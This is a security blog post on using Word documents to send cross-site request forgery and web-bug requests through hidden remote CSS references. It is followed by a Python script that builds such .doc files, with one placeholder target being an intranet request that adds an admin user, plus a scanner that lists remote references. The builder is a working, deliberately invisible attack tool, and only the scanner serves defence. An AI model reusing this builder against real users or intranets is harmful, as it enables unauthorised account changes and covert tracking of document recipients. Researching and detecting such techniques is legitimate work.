Okay, I didn’t write part I, and really didn’t even know about it until today, although I invented something like it months and months ago. But the first person to talk about CSRF within Word was Michael Daw. Very interesting concept. When I was using a similar technique, I was using it primarily as a web bug. Michael Daw’s technique is good, but I like mine better, because while it’s probably just as noisy, it leaves no visible cues to the victim.
Michael includes a remote image (I’ve had mixed luck trying this myself). My failures in trying nearly the exact same thing were fixed when I came up with another way to inject embedded files into Word. Those files were actually CSS files that Word will happily go and fetch for you. Click here to get the scoop on how to inject CSS files into Word. Using this same technique, you can easily turn this into a complex platform for doing many CSRFs through a single Word file. See what happens when no one tells me about these things? Sheesh! Nice work Michael, I just wish I had seen it when it came out!
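As an added illustration of the "many CSRFs through a single Word file" idea (example code written for this page, not the author's own injection method, which the post links to rather than reproduces), the script below builds a Word-openable HTML document whose head carries one remote stylesheet reference per target URL, and pairs it with the check a defender would want: a scanner that pulls every remote `link`/`img` reference back out of such a file. It assumes Word will open an HTML file saved with a `.doc` extension and fetch its stylesheet references on open; the hostnames and paths are constructed placeholders.

```python
"""
Added example, not code from the original post. Builds a Word-readable HTML
document that references several remote stylesheets (each one a GET that the
victim's Word issues on open), plus a scanner that lists those references.
Assumption: Word opens HTML content saved as .doc and fetches <link> hrefs.
"""
import html
import re

# Constructed placeholder targets; every entry is a GET request that the
# document will cause Word to issue when it is opened.
SAMPLE_TARGETS = [
    "http://tracker.example/log?doc=report.doc",                 # web-bug beacon
    "http://intranet.example/admin/addUser?name=x&role=admin",   # CSRF-style GET
]

def build_word_html(targets, visible_text="Quarterly report"):
    """Return HTML that Word opens as a document. Each target becomes a
    <link rel="stylesheet">; nothing visible is added for it, so unlike a
    broken remote <img> there is no placeholder box for the victim to notice."""
    links = "\n".join(
        f'<link rel="stylesheet" type="text/css" href="{html.escape(t, quote=True)}">'
        for t in targets
    )
    return f"""<html xmlns:o="urn:schemas-microsoft-com:office:office"
      xmlns:w="urn:schemas-microsoft-com:office:word">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
{links}
</head>
<body><p>{html.escape(visible_text)}</p></body>
</html>"""

# Matches the URL attribute of <link ... href=...> and <img ... src=...>.
_REF_RE = re.compile(
    r'<(?:link|img)\b[^>]*?(?:href|src)\s*=\s*["\']?([^"\'\s>]+)', re.I
)

def external_refs(doc):
    """Defender-side check: every http(s) URL a link/img element in the
    document would make Word fetch, with HTML entities decoded."""
    return [
        html.unescape(u)
        for u in _REF_RE.findall(doc)
        if u.lower().startswith(("http://", "https://"))
    ]

def write_doc(path, targets=SAMPLE_TARGETS):
    """Write the document with a .doc extension so Word opens it."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(build_word_html(targets))

if __name__ == "__main__":
    doc = build_word_html(SAMPLE_TARGETS)
    for url in external_refs(doc):
        print("remote fetch on open:", url)
```

Because a stylesheet reference is fetched with a plain GET, this only reaches endpoints that change state on GET; the same scanner, run over documents at a mail or file gateway, is a cheap way to flag Word files that reference hosts outside your own.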